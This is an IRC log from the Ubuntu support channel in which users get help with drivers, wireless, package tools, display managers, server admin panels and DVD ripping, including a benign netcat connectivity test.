Kane_HartI tried using my 4890GTO under linux like 4-5 months ago it was the worst experince ever02:30
turgonand what is the intel link u gave?02:30
slimjimflimturgon: mobile means wireless generally02:30
seb_nibblyn: ????02:30
nihilistzaKane_Hart, my desktop has an ATI Radeon 5870 and it worked very well, not as fast as Windows 7 but very good otherwise02:30
slimjimflimturgon: it's the manufacturer's site02:31
varunthackertomreyn: unfortunately no. Same message waiting for s0.wordpress.com02:31
tucemiuxok what about the software center, that's an easy one, how do you install/remove appz ??02:31
slimjimflimthe page for your wireless adapter02:31
turgonslimjimflim: yeah i know :P but i mean it's its driver?02:31
Kane_Hartso nvidia vs ati though im guessing the ati is like 10 times better?02:31
jordanwbWhere can I find a how-to on setting up dual screen with the nouveau driver?02:31
FloodBot2Kane_Hart: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.02:31
ajamison5579bloggtk does not seem to work out of the repository is there a known issue with it or something02:31
slimjimflimturgon: i was just showing you what you had02:31
tomreynvarunthacker: can you access http://s0.wordpress.com ?02:31
slimjimflimturgon: why did you need to know?02:31
acovrigcan anyone help with a dansguardian configuration?02:32
tucemiuxi cant install software, I dont have an add/remove applet, anyone knows how to fix this??02:33
nihilistzatucemiux, don't you have Synaptic package manager?02:33
turgonslimjimflim ok... umm... i am on lucid. it works with my wirless card .. However, i am facing problems when i get a bit further from the router. I figured it out because ubuntu did not connect while windows did02:33
vltpandora: There's also "scp" and quick, dirty and less cpu consuming for large files "tar" piped to "nc" ;-)02:33
acerimmer_tucemiux: applications > Software Center02:34
tucemiuxnihilistza, i have synaptic but I want to use software center02:34
turgonslimjimflim: the problem is that it connects but then almost repeatedly disconnects...02:34
turgonslimjimflim: i wanted to try to uninstall the driver and insall it manually02:34
tucemiuxacerimmer_, my distro doesnt have software center, i just installed lucid and I cant find the software center applet anywhere!! how do i put the applet into my menu?02:34
varunthackertomreyn: now it says waiting for s0.wp.com. is it got to do with the last post on the forum i posted?02:35
pandoravlt, that is very confusing02:35
acerimmer_tucemiux: are you maybe on a netbook here?02:35
makdissethere is a way to allow machines to access the network only if the mac addr of it is listed on dhcpd.conf? mine dhcp-server has the mac addr list to distribute ips, but if someone use a static ip, the dhcpd dont block him.02:35
nibblynseb_, could you check your mem usage reported in system monitor (GUI)?02:35
tucemiuxacerimmer_, nope, im using ubuntustudio which is the same as ubuntu, just with a real time kernel02:36
acerimmer_tucemiux: me too.  Software Center is NOT an applet02:36
nihilistzaI don't have software center in a fresh lucid install (gnome) either02:36
nihilistzabut you can run it via alt+f2 and type in software-center02:36
nihilistzaits just not in the menus02:36
acerimmer_tucemiux: Applications>Ubuntu Software Center02:36
turgonslimjimflim: but anyway.. how can i reinstall my wirelles driver?02:36
tucemiuxhow do I start the Ubuntu software center via the command line?  I dont have the GUI applet02:37
acerimmer_tucemiux: private??02:37
pandoraim such a noob02:37
jordanwbWhere can I find a how-to on setting up dual screen with the nouveau driver?02:37
rwwtucemiux: "software-center"02:37
jimi_Can someone tell me if there is a newer version of gtk-gnutella? im getting amessage about ancent version02:37
seb_nibblyn: 514mb02:38
tucemiuxrww, it's not installed, I have to install it manually, is this a bad thing?? O_o02:38
makdissecan I block access to the network to machines which are not listed in the dhcpd.conf file?02:38
tomreynvarunthacker: the last post you have on the forum doesn't make much sense to me. please try this: open a terminal window, then type this and press enter when ready: nc -vv s0.wordpress.com 8002:38
hiexpook i have tried slowing the burn speed down to see what happens02:38
acerimmer_tucemiux: I run ubuntustudio as well.  if you're at the command line, use synaptic apt-get install02:38
tomreynvarunthacker: you should then get to see this message: "Connection to s0.wordpress.com 80 port [tcp/www] succeeded!"02:39
icehawk78My box won't play audio through hdmi after restarting - any ideas?02:39
varunthackertomreyn: i got that message02:39
rwwtucemiux: if you want to use software center, than presumably you should install it ;P02:39
tomreynvarunthacker: if you get to see this message, please type this next: GET / HTTP/1.102:39
rwwthe package is named "software-center" too.02:39
nibblynseb_, thanks; however that's a different number, don't ask me why ;)02:39
tomreynvarunthacker: then: Host: s0.wordpress.com02:39
acerimmer_tucemiux: maybe I'm confused.  Just how exactly did you install ubuntu and ubuntustudio?02:40
acerimmer_wondering how you DON"02:40
tomreynvarunthacker: then press enter twice02:40
tucemiuxacerimmer_, do you have lucid?  ubuntustudio began using software center in lucid but I just installed lucid from an ISO and it didnt have the software center, I upgraded from karmic to lucid and "add/remove" was replaced with "software center".  But "software center" did not get installed when I installed lucid from an ISO02:40
vltpandora: There are several different ways to transfer files. Do you need it just once, only one-way or do you want to setup something like NFS?02:40
seb_nibblyn: diff number?02:40
acerimmer_tucemiux: cna you private chat?02:40
ubottuPlease ask your questions in the channel so that other people can help you, benefit from your questions and answers, and ensure that you're not getting bad advice. Please note that some people find it rude to be sent a PM without being asked for permission to do so first.02:40
tucemiuxacerimmer_, yes02:40
Ranjanhello every body I need your help to install an driver for digital Pen Tablet on ubuntu 10.04 .. I am following this guide  at  https://help.ubuntu.com/community/TabletSetupWizardpen .. but I  am messing out some were .. any help would be of great help on this regard .. Thanks in advance02:40
acerimmer_rww: ok02:40
tomreynvarunthacker: you should then see this: http://pastebin.com/5S5VNT9C02:41
acerimmer_tucemiux: ok, first, you did a COMPLETE install of lucid, yes02:41
tucemiuxrww, do you know the name of the wireless applet that stays up in the corner all the time?02:41
nibblynseb_, well, 896832k total,   838332k used, <> 514Mb used ;P02:41
acerimmer_tucemiux: "indicator applet"02:41
tomreynvarunthacker: it's possible that your connection drops and you get bumped back to the shell if you type too slowly. if this happens then just restart from the 'nc' command above02:41
=== Gordon is now known as Guest80135
Guest80135hello again, does anyone know hot to fix the boot screen resolution? it got messed up after i installed ATI catalyst02:42
Jordan_Uantonius: You can either boot OSX directly from grub, or load chameleon from the filesystem via "multiboot".02:42
seb_nibblyn: ok so my moniter says it right?02:42
tucemiuxacerimmer_, I upgraded karmic to lucid, I hosed it, sort of fixed it, and decided to reinstall lucid using an ISO.  I downloaded the ISO and installed lucid, this time lucid didnt have the software center02:42
solidsnackWhat file do I modify to configure "cloud-config"?02:42
rwwtucemiux: the applet itself is "nm-applet", the package is "network-manager-gnome".02:42
seb_nibblyn: lol man i suck02:42
solidsnackWhere can I find docs for this tool?02:42
jerry_I am new to using linux and ubuntu. I need to install some software. How do you "run" ./configure? I cannot seem to find the command - sorry- too used to windows.02:42
rwwtucemiux: what was the name of the ISO file?02:42
solidsnackjerry_: You need to open a terminal.02:43
tucemiuxrww, i downloaded from ubuntustudio official site02:43
vltjerry_: Is that software in the ubuntu repository or do you really need to compile it?02:43
Jordan_Ujerry_: Install software via Applications > Ubuntu Software Center, or for a more advanced interface System > Administration > Synaptic Package Manager02:43
nibblynseb_, why they are different don't know, I can just guess, but I can tell you that the amount used is ok02:44
solidsnackjerry_: You rarely need to do things that way, though.02:44
jerry_Thanks, will try that.02:44
acerimmer_rww: you want to help tucemix fix his ubuntustudio?02:44
seb_nibblyn: lol ok thanks, just seems like alot considering the little i have running....02:44
tucemiuxacerimmer_, rww I got the software center installed, the wireless icon is up where it's supposed to be02:45
jerry_thanks solidsnack, been pulling my hair and wondering why this is so difficult when eveything in linux is soooo smooth02:45
rwwacerimmer_: not really, I have a meeting in 15 minutes ;P02:45
acerimmer_so problem solved then!02:45
tucemiuxim going to reboot and see if the wireless icon is still there after a reboot and then test to see if it connects, thanks you rww acerimmer_02:45
acerimmer_tucemiux: so you're all fixed??02:45
tucemiuxacerimmer_, yes now im going to reboot to test, im just wondering why that software didnt get installed by default?02:46
soreauseb_: What does 'glxinfo|grep renderer' say now?02:46
acerimmer_tucemiux: do the rebooot and enjoy.02:46
nibblynseb_, standard lucid install here, running at 532Mb (system monitor) and 2831156k total,  1252956k used (using top)02:46
makdissecan I block access to the network of machines which are not listed in the dhcpd.conf file?02:47
seb_soreau: Xlib:  extension "ATIFGLRXDRI" missing on display ":0.0".02:47
soreauseb_: then you havent successfully removed fglrx or you need to reinstall those two packages I mentioned earlier02:48
seb_nibblyn: okay02:48
icehawk78Any clue why my audio over hdmi would stop working after restarting?02:48
demifurorguys, im trying to use this script to austostart my ps3 media server once im connected to my lan at system startup. the thing is, the server never gets started, and the log file continues ro populate with "Waiting..." when im using the system. However, if i run the script myself, the server starts http://pastebin.com/RudJcQL602:49
Guest3014hello I have a problem with my Lucid Lynx install--I can not add a user02:49
seb_soreau: sorry i did uninstall just figured out knowing how i did in a previous install, that my desktop is faster if i run the other packages, is that possible?02:49
joschtmy lucid lynx is all messed up i cant log in graphically. half of the screen is like the magnifier02:49
soreauseb_: What other packages for what?02:49
seb_soreau: well i have the two other packages installed02:50
vltmakdisse: Is your ubuntu machine between those machines and the network you want to protect?02:50
demifurorcan anyone help me?02:51
Guest3014I can't seem to add a user to my  lucid Lynx install.... Can some one help?02:51
soreauseb_: Yes but you need to reinstall them because installing the fglrx driver may overwrite the libGL files you need02:51
seb_soreau: but i also installed the other ones over it lol probably sounds strange but just seems to work better02:51
joschtand then when i log by typing my password it goes to a black screen flashes text and returns to the login screen02:51
soreauseb_: No, it's not working correctly right now02:51
Guest3014Cause my father seems to be to stupid to do it himself he put his 12 year daughter in charge02:51
Guest3014so help?02:51
acerimmerdemifuror: what's the issue02:51
seb_soreau: okay il get it back to how you said02:51
demifuroracerimmer:  im trying to use this script to austostart my ps3 media server once im connected to my lan at system startup. the thing is, the server never gets started, and the log file continues ro populate with "Waiting..." when im using the system. However, if i run the script myself, the server starts http://pastebin.com/RudJcQL602:52
hiexpook it is a brasero bug02:52
acerimmerdemifuror: sorry, I don't have the knowledge for this one...anyone else?02:52
soreauGuest3014: What have you tried to do to add the new user?02:52
hiexpothat silly thing has cost me a bunch of dvds02:52
connermcdGuest3014: System->Administration->Users and Groups02:53
seb_soreau: something happend there to me02:53
joschtdoes anyone know what the command is to start a graphical interface from a tty? im stuck here and cant do anything02:54
soreaujoschi: Try 'sudo /etc/init.d/gdm start' or 'startx'02:54
demifurorjoscht: sudo service gdm start02:55
shape|awayquestion: when installing ubuntu on a virtual HDD, it asks me if I want to install GRUB on my hard drive02:55
shape|away*first hard drive02:55
joschtdemifuror: thank i will try it02:55
shape|awaydoes that mean the virtual HDD?02:55
shape|awayIt says it didn't find any other OSs02:56
vltshape|away: How did you install?02:56
shape|awayVirtualBox, from an .iso02:56
joschtdemifuror: it says failed to aquire org.gnome.displaymanager02:56
vltshape|away: And it's still running in VirtualBox? Then it's the virtual HDD of course02:56
shape|awayok, great02:57
shape|awayI just didn't wnat to screw up my system.02:57
soreaujoschi: sounds like your system may be missing some packages it needs. Can you try 'apt-get install --reinstall ubuntu-desktop'?02:57
vltshape|away: That's what virtual machines are for ;-)02:57
demifurorsoreau: joscht is asking, not joschi02:57
joschtsoreau: yea i will try that right now02:57
soreaubah. auto-tab-complete fail02:58
joschtsoreau: it still doesnt work, after it fails to aquire org.gnome.DisplayManager it says "could not aquire name; bailing out"02:59
seb_soreau: hey do you mind giving the name of those two packages again please?02:59
shape|away...why can't I type anything in on the passwor like?03:00
joschtshape|away: it looks like your typing nothing but you are just type ur pass and press enter03:01
shape|awayok, so there's no GUI for Ubuntu server?03:01
jerry_Back again. Have a HDHOMERUN device to connect to cable tv and record programs. Been trying to install the software and it says the following: Extract both libhdhomerun and hdhomerun_config_gui to the same directory, eg:03:02
jerry_From the hdhomerun_config_gui directory run:03:02
FloodBot2jerry_: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.03:02
jerry_sorry, new to this. Don't even know what you are referring to as flood. Just trying to get help, not criticism03:03
lightacan someone help me with vsftpd here ?03:04
joschtdoes some one know what is my problem?03:04
jerry_just need to know how to install software through "run"  command??03:04
acerimmershape|away: default server install does NOT include gui03:05
joschtsudo shutdown now03:05
joschtwoops sorry03:05
lightajerry_, sh command you mean ?03:05
jerry_lighta , not sure what youmean by sh command. How do you "run" a command03:06
lighta? you just type the command you want in a terminal ?03:07
lightawhat's the command you want to do ?03:08
jerry_./configure and the reply I get is that it cannot find the file03:09
connermcdjerry_ you have to change to the appropriate directory where you extracted it03:09
ian_How can I make the edges of windows easier to grab with the cursor?03:09
connermcdjerry_ use "cd /path/to/directory" to change directory then do ./configure03:09
connermcdjerry_ or do "/path/to/directory/configure"03:10
jerry_Thought I was in desktop where I moved all relevant files03:10
Kane_Hartwhere can I fnd this in the db? - Quests Completed - Total Damage Done - Total Damage Received - Total Healing Done03:10
connermcdjerry_ you may need to move into a subfolder after extraction03:10
seb_soreau: i now get nothing when i type in glxinfo|grep renderer$03:10
Kane_Hartwrong irc03:10
jerry_ok, thanks, will try03:10
lighta./ mean current directory you probably must use not related path eg ( /home/../Bureau/config..)03:10
connermcdian_ do you mean for resizing a window?03:11
seb_soreau: so the packages i need were libdrm-radeon1 and?03:11
=== flashkidd_ is now known as flashkidd
SRejectyea. Am back03:12
RoastedI'm trying to figure out how to install a LAMP server on my Ubuntu 10.04 box. Is there any easy how to guides for me to follow, or can anybody offer any help or advice on the subject?03:13
acerimmerRoasted: "ubuntu server guide"03:13
ian_connermcd yes, it's really hard on my netbook (seems like only a pixel or two wide)03:13
seb_soreau: ??03:13
Roastedacerimmer, you're saying google that?03:14
acerimmerRoasted:  suggestion only03:14
connermcdian_ try holding down alt and clicking the mouse wheel... I believe there's a compiz setting as well03:14
soreauseb_: libgl1-mesa-glx and libgl1-mesa-dri03:15
acerimmerRoasted: http://www.google.com/url?sa=t&source=web&cd=3&ved=0CBsQFjAC&url=http%3A%2F%2Fwww.ubuntu.com%2Fserver%2Fget-ubuntu%2Fdownload&ei=o5AVTKL_HMionQecn7CEDA&usg=AFQjCNFs8iqD9lk8egpQkjkBmn99ghlFbw03:15
connermcdian_ yes, in compiz the setting is Super plus mouse wheel button but you can change it of course03:15
Roastedacerimmer, I'm not running ubuntu server. I'm on ubuntu desktop edition. I just want LAMP installed on my desktop.03:16
NemoderHow do I boot the liveCD into console only?03:16
acerimmerRoasted: ah.  sorry for the confusion.03:16
ubuntu_Roasted: of course it depends on what you're wanting it for, but I was just messing w/ ebox and it pretty much handles all setup and config for you03:16
Roastedubuntu_, does webmin do that? I have webmin installed...03:17
ubottuwebmin is no longer supported in Debian and Ubuntu. It is not compatible with the way that Ubuntu packages handle configuration files, and is likely to cause unexpected issues with your system. See !ebox instead.03:17
Roastedwebmin is no longer supported!?!?!03:17
Roastedholy wtf?03:17
ubuntu_Roasted: that note just posted re: Webmin is why I was playing w/ ebox03:17
seb_soreau: i get this now OpenGL renderer string: Mesa DRI R300 (RS690 791F) 20090101 x86/MMX+/3DNow!+/SSE2 NO-TCL03:18
soreauseb_: Great, 3D is working now03:18
rwwRoasted: it hasn't been supported for a while, actually.03:18
ian_connermcd what if I'm not using compiz?03:18
ian_which I'm not on my netbook03:18
Roastedubuntu_, I'm looking at ebox now. there's quite a few in software center. is there a "download ebox" and get all of the above option?03:18
Roastedrww, that's surprising. webmin is pretty darn solid.03:18
seb_soreau: thanx03:18
RoastedI think when I got on the webmin bandwagon, ebox was still in its beta-like stage. Looks like things have changed, I take it?03:18
seb_soreau: now i just have to get my wireless going03:19
ian_connermcd oh sorry, didn't see the previous one03:19
soreauseb_: What wifi chip is it as reported by lspci?03:19
connermcdian_ alt+F8 - you can change the keyboard shortcut as well03:19
Spaztic_OneWhat is the general ubuntu chat again?03:19
Spaztic_Onethe IRC room I mean03:19
Italiandevil0505hey looking for some help getting my vista laptop to see my ubuntu desktop over the network, as of now the vista laptop just says unknown device for the ubuntu pc03:19
soreau! ot | Spaztic_One03:19
ubottuSpaztic_One: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!03:19
ubuntu_Roasted: I understand webmin is popular w/ its adherents, but I think it only works on older versions of Ubuntu, (maybe 8.04???)03:19
seb_soreau: Broadcom Corporation NetLink BCM5787M Gigabit Ethernet PCI Express (rev 02)03:20
soreau! broadcom | seb_03:20
ubottuseb_: Help with Broadcom bcm43xx can be found at  https://help.ubuntu.com/community/WifiDocs/Driver/bcm43xx03:20
Roastedubuntu_, works terrific on 10.04. I've had zero issues and use it extensively on production servers at work.03:20
ian_connermcd thanks03:20
Roastedubuntu_, what does "not supported" mean? It's in the software center... *shrug*03:20
ubuntu_Roasted: interesting.03:20
soreauseb_: I am not familiar with broadcom chips but I think you might need a 3rd party driver (not completely sure)03:21
ubuntu_Roasted: well the note says it has an incompatible way of handling packages.03:21
IdleOneRoasted: means that it is still available but that it is not officially supported and you use it at your own risk03:21
connermcdian_ no prob03:21
RoastedIdleOne, but ebox is fully supported?03:21
Italiandevil0505ubuntu_, hey looking for some help getting my vista laptop to see my ubuntu desktop over the network, as of now the vista laptop just says unknown device for the ubuntu pc03:22
IdleOneRoasted: according to the factoid ebox is the recommended package.03:22
RoastedIdleOne, hm, good deal. I'll play it safe and try this then :P03:22
ubotturoasted: Landscape makes the management and monitoring of Ubuntu systems simple and effective by combining world-class support with easy to use online management tools. https://landscape.canonical.com/03:22
IdleOneRoasted: also I do not see webmin in my repos. you must have unofficial repos enabled03:22
RoastedIdleOne, perhaps I do - its in the software ctr though for me.03:23
RoastedIdleOne, I thought webmin was a .deb download from their site, but when I checked software ctr it was there. pretty sure I got it from their site tho03:23
IdleOneRoasted: you probably added their repository03:23
IdleOnesoftware center will list all available packages in any repositories you have in your sources.list03:24
RoastedIdleOne, I didnt add any repos except medibuntu I believe. this is a pretty new install.03:24
IdleOnethere ya go03:24
RoastedIdleOne, I didnt see anything noted as webmin in my sourcse.list - just checked it there.03:24
RoastedIdleOne, ah, that's the money shot? medibuntu?03:24
Italiandevil0505ubuntu: hey looking for some help getting my vista laptop to see my ubuntu desktop over the network, as of now the vista laptop just says unknown device for the ubuntu pc03:24
IdleOneRoasted: probably03:24
seb_soreau: it seems i have to use ndiswrapper for this but in my last install of ubuntu, (i reinstalled everything) i managed to connect with hardware drivers... now it dosn't work03:25
pushpopHi all I'm trying to install 10.04 but what happens when I boot to the cd it starts and goes to the ubuntu logo then the screen just go wacky and the install locks up03:25
Roastedjust installed ebox AND landscape - where they hiding at?03:25
IdleOneRoasted: apt-cache policy webmin will tell you what repo it comes from03:25
dayrotanyone know if dvd::rip has an irc channel?03:26
acerimmerpushpop:did you checksum your iso and disk?03:26
soreauseb_: Well as I said, I am not familiar with broadcom. But if you used native linux drivers with it on the same version of ubuntu it should still be possible, just google03:26
ubottudeckerdutil: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!03:26
pushpopacerimmer yes and burnt the cd two times to see if that was the issue03:26
IdleOnedeckerdutil: please stop03:26
occyheh... craziest thing ever.  Sound _IS WORKING_ with World of Warcraft via Wine, but I can't get sound to come out of firefox while playing a Youtube video???03:26
connermcddayrot I know not... I have used acidrip as a mencoder graphical user face for ripping DVDs to AVIs and I like it03:27
connermcddayrot but not to impose my own software preferences... if you have a question about dvd::rip I can try to help03:27
acerimmerpushpop: alternate installation method iso usually avoids all those nasty gui issues during boot/install.03:27
pushpopacerimmer thank you ill look into that03:27
dayrotconnermcd, have you done animes, splitting the episodes and integrating subtitles?03:27
Roastedhow do I log into landscape03:28
connermcddayrot I have done other television series splitting episodes.. it has a queueing feature that works nicely... I have not done any subtitles but there are options available for that03:28
IdleOneRoasted: see landscape.canonical.com for more info03:28
seb_soreau: thank you03:28
RoastedIdleOne, already on it. I see screenshots and uh, thats about it.03:28
occyit feels like 1996 again...  Not sure why we switched to pulseaudio... I've only ever had tons of problems with it. :(03:29
soreausebner: no problem03:30
soreaudamn this channel03:30
* soreau leaves03:30
dayrotconnermcd, the problem I am having is this dvd only has one title and each episode is about 4 chapters. Subtitles only seem to work if you do the title at once...03:30
connermcddayrot can't you just rip the whole thing then split it using pitivi03:31
Roastedhey, uh. landscape. how can I log into it?03:31
dayrotconnermcd, idk, i'll have to look at that program, but i would rather the subtitles be vobsub and not part of the avi03:32
connermcddayrot ah I see03:32
Roastedoh wait - landscape isnt free???03:32
Roastedis this for fricken real?03:32
hiexpodayrot,  what app u using to rip it?03:32
dayrothiexpo, dvd::rip03:32
hiexpodayrot,  is it an encrypted dvd?03:33
ubuntu_Roasted:  If its like ebox (never used it) you log into it by giving the https://<ip address of the machine>/ebox03:33
IdleOneRoasted: that is right03:33
Roastedwow. landscape fails. isn't it kind of ironic that canonical is mr open source yet this costs money?03:33
Roastedyeah, time to look into ebox.03:34
dayrothiexpo, probably, but that wasn't a problem, it ripped just fine03:34
IdleOneRoasted: no it isn't03:34
ubuntu_Roasted: the medibuntu site includes non-free software.03:34
bobthemilkmanRoasted: Free as in beer and free as in money are not mutually exclusive.03:34
dayrotI am just trying to figure out how I'm gonna do subtitles03:34
hiexpodayrot,  what happened?03:34
Roastedbobthemilkman, explain?03:34
IdleOnebobthemilkman can you please explain it in #ubuntu-offtopic03:34
=== stove is now known as Takaro
RoastedIdleOne, I think this is relevant to ubuntu main support, to be honest.03:35
dayrothiexpo, basically dvd::rip only lets you do subtitles on the title of the dvd, which in this case is the entire thing. Each episode is about four chapters of the dvd not separate titles.03:35
soreauRoasted: In english there's just 'free'.. but there can be at least two different meanings. http://en.wikipedia.org/wiki/Gratis_versus_Libre03:35
bobthemilkmanThis is a technical support channel, not a Debian philosophy channel.03:36
Roastedbobthemilkman, it's still relevant to ubuntu and the differences in software directly affiliated with it.03:36
IdleOneRoasted: enough03:36
RoastedAs a result, it's on par with support from here. IMHO.03:36
Roastedwow. really?03:36
ubottucomput-vieja: En la mayoría de canales de Ubuntu se habla sólo en inglés. Si busca ayuda en español o charlar entra en el canal #ubuntu-es. Escribe "/join #ubuntu-es" (sin comillas) y dale a enter.03:36
IdleOnethis is not a discussion channel. this is for support03:36
IdleOneyes really03:36
kelly_my nero linux 4 express crashes whenever i try to run it     can anyone help me fix this problem03:37
h3nryi am trying to set up CUDA on Ubuntu 9.1. I need to install the nVidia dev drivers, which requires me to exit the gui. So I enter "sudo /etc/init.d/gdm stop" in a terminal, and the computer locks up03:37
h3nryany suggestions?03:37
ubottukelly_: #ubuntu is the Ubuntu support channel, for all Ubuntu-related support questions. Please use #ubuntu-offtopic for other topics. Thanks!03:37
Roastedahh, ubuntu mods. *takes it back 70 notches* sorry I just came back from vacation, forgot how restricted it is in these parts.03:37
dayrothiexpo, so the only thing I think I can do is rip the thing as one file and integrate the subtitles in the avi. then split the avi into episodes. But that to me isn't very pure, I like the subtitles as an option03:37
Roastedmy dearest apologies, IdleOne03:37
smegzorIs anyone else having trouble right clicking recently in 9.04?  Recently my right click has been behaving erratically.  It appears to sometimes release while I'm still pressing the button which causes me to select options I didn't intend.  It is happening in many apps, but I mainly notice it in firefox, nautilus, and my wallpaper app, webilder.  I have not tried another mouse yet.03:37
soreauh3nry: Tried recovery mode?03:37
connermcddayrot you might look at http://kdenlive.org/03:37
sebsebsebacerimmer: how is kelly_ off topic?03:37
Roastedcan I ask a question about ebox now? or should I take that to OT since its a program for ubuntu and not a question about ubuntu itself?03:37
dayrotok thanks connermcd03:37
h3nryim not much of a linux power user. how do i get to recovery mode?03:38
acerimmersebsebseb: nerolinux?03:38
phobos_anomalyRoasted: with the way they work here, it might be better off in ot03:38
Roastedphobos_anomaly, no kidding man.03:38
sebsebsebacerimmer: yes kelly_  seems to want some propritary  burning software working in Ubuntu,  and maybe kelly doesn't know about Brasero and K3B03:38
RoastedI think I'll do that regardless. I often get better help there anyway. :P03:38
soreauRoasted: the policy is to just ask. don't ask to ask. If it's ot, someone will say so03:38
connermcddayrot - also http://ubuntu.sabza.org/2008/03/02/ubuntu-linux-subtitles-video-editing-and-dvd-authoring/03:38
bobthemilkmanh3nry: There is no recovery mode. If you need administrative properties, use sudo, or sudo -s. If you broke your GUI, drop into a TTY with alt+F1-F6. If you really messed up your system, pop in a live-CD and then chroot into your system.03:39
h3nryi didnt do anything yet!03:39
Roastedsoreau, well I asked a relevant question earlier, and I was told it wasn't applicable to this chat. I want to do the right thing and make sure I'm on subject with the narrow set of applicable questions that are allowed to be asked here. That's all. But we're all good now - I'm just taking it to OT.03:39
h3nryi wanted to get into the terminal to install something, but i cant get there03:39
soreau! who h3nry03:40
soreau! who | h3nry03:40
ubottuh3nry: As you can see, this is a large channel. If you're speaking to someone in particular, please put their nickname in what you say (use !tab), or else messages get lost and it becomes confusing :)03:40
pieroHi! Can I make something like a dist-downgrade to remove proposed updates I had installed lastday?03:40
h3nryubottu: oops. sorry03:40
bobthemilkmanh3nry: Use alt+F1 to drop into a TTY03:40
IdleOne!downgrade | piero03:41
ubottupiero: Attempting to downgrade to an older Ubuntu version is explicitly not supported, and may break your system.03:41
n2diyh3nry: when your system is booting, you'll have an option to hit the escape key, that will show you your recovery mode options, at least in Xubuntu.03:41
bobthemilkmanh3nry:  errr, ctrl+alt+F103:41
bobthemilkmanh3nry: (Specifically, leftctrl+leftalt+F103:41
h3nrybobthemilkman: i just did that, and it did something, but didnt take to to a tty03:42
pieroIdleOne, I want not to downgrade to an older ubuntu version. I had installed ubuntu proposed updates and now I want to downgrade the packs it upgraded before03:42
phobos_anomalypiero: down-grading isn't supported.03:42
h3nrybobthemilkman: i still see the terminal window, but the area where the desktop was went black, the cursor is flashing but it is not recognizing my keystrokes03:42
connermcdpiero is there a specific problem you're having?03:42
h3nrybobthemilkman: i am running this in a sun/oracle VirtualBox VM in Win7. Perhaps its a display issue when I leave the gui?03:43
pieroconnermcd, yes. My scp is working funny.. it's stalls about 10 seconds after the transfer starts.. no matter what I'm transfering03:43
h3nrybobthemilkman: ctrl+alt+f7 took me back into the gui with no problems03:43
bobthemilkmanh3nry: The easier solution to your problem is sudo apt-get install nvidia-current-dev03:44
sultanselephantanyone have a way cool tip about how to install adobe air2 on 64bit03:45
Nitrus^1i just updated to interpid, i now i have huge list of unrecognized tasks in aptitude, how do i clean these up and/or what do they mean?03:45
h3nrybobthemilkman: it just says couldn't find package nvidia-current-dev03:45
TamnakzCAn anyone give me skype help in 8.10?03:45
h3nryi have downloaded the dev drivers already, but when i try to install them it says i can not do so with the GUI running03:45
sebsebsebNitrus^1: upgraded to Intrepid from what? Hardy?03:45
sebsebsebNitrus^1: oh dear03:45
acerimmerNitrus^1: ?)03:46
sebsebsebNitrus^1: since you had 8.04, you could have upgraded to 10.04 straight away, now it is to late03:46
bobthemilkmanh3nry: Hold up, I'm gonna cancel my X session so I can give you an exact answer.03:46
sultanselephanti never upgrade03:46
TamnakzCan anyone help me get a mic working on skype?03:46
h3nrybobthemilkman: and the getting started guide found at http://developer.nvidia.com/object/cuda_3_0_downloads.html says to use "sudo /etc/init.d/gdm stop"03:46
sultanselephantyou gotta wipe it!03:46
sebsebsebNitrus^1: now you would have to go through 9.04 and 9.10 first, or just clean install03:46
Nitrus^1there was no LTS between those releases?03:46
acerimmerNitrus^1: my vote: clean install03:46
sebsebsebNitrus^1: indeed03:46
reduzquestion! how do i install TTF or OTF fonts in ubuntu? this can be done easily in windows, but i can't find it anywhere in ubuntu!03:46
bobthemilkmanOh wait, lunch time.03:46
bobthemilkmanh3nry: Gotta go to lunch!03:46
IdleOnewhat does the upgrade have to do with Nitrus^1 mic issue?03:47
RoastedThe ebox tutorial is telling me to type in my IP in the web browser, and when I go it says It Works! but that's it. What am I missing to get ebox to work so I can see the login screen?03:47
h3nrybobthemilkman: fair enough. thanks for the help so far!03:47
IdleOne!sound | Nitrus^103:47
ubottuNitrus^1: If you're having problems with sound, click the Volume applet, then Sound Preferences, and check your Volume, Hardware, Input, and Output settings.  If that fails, see https://help.ubuntu.com/community/Sound - https://help.ubuntu.com/community/SoundTroubleshooting - http://alsa.opensrc.org/DmixPlugin - For playing audio files,  see !players and !mp3.03:47
sultanselephant!medibuntu | reduz03:47
ubottureduz: medibuntu is a repository of packages that cannot be included into the Ubuntu distribution for legal reasons - See http://www.medibuntu.org03:47
crazygirhiya, so I upgraded 9.10 --> 10.4 a few days ago,all is well (a couple of previous issues fixed) except Firefox freaks out a lot. anyone else notice FF + noscript will reliably crash when trying to touch noscript settings when enabled? FF will crash and even take out x03:47
bobthemilkmanh3nry: Anyway, you might need to install *other* video card drivers first, and then drop to TTY1, and then do the installation from there.03:47
sebsebsebIdleOne: yeah I guess, however 8.10/Intrepid is no longer supported03:47
Nitrus^1mic issue? i have no mic issue?03:47
crazygirI've also had ff take out itself when trying to fullscreen a flash video(reliably)03:47
IdleOneNitrus^1: sorry wrong person03:47
reduzsultanselephant, i don't care about that, i have a TTF of my own and i want to install it03:48
h3nrybobthemilkman: ok. its late here, so maybe i'll fight with this tomorrow (when i can consult with some of my more linux-savvy friends)03:48
IdleOne!sound | Tamnakz03:48
ubottuTamnakz: If you're having problems with sound, click the Volume applet, then Sound Preferences, and check your Volume, Hardware, Input, and Output settings.  If that fails, see https://help.ubuntu.com/community/Sound - https://help.ubuntu.com/community/SoundTroubleshooting - http://alsa.opensrc.org/DmixPlugin - For playing audio files,  see !players and !mp3.03:48
sebsebsebcrazygir: Firefox  full screen Flash issue aye?03:48
sultanselephant!font | reduz03:48
ubottureduz: Font installation basics here: https://help.ubuntu.com/community/FontInstallHowto - No fonts in Flash? Install "msttcorefonts" (from !Multiverse), "gsfonts", and "gsfonts-x11". No fonts in MPlayer? see !MPlayer03:48
IdleOneTamnakz: specifically make sure your mic is not muted03:48
Tamnakzidleone: linux recognized the mic, but not skype03:48
crazygirsebsebseb: read the first message first03:48
reduzsultanselephant, thanks a lot!03:48
sultanselephantreduz: dont thank me, thank ubottu03:48
sebsebsebcrazygir: yes read them both, however for the full screen Flash issue, I have a link03:48
sebsebsebcrazygir: also yes add ons can sometimes go wrong in Firefox03:49
crazygirI've *never* had noscript give a problem like this03:49
sultanselephantscrew noscript03:49
crazygirit also started immediately after the 10.4 upgrade03:49
=== xue is now known as chaojidiguo
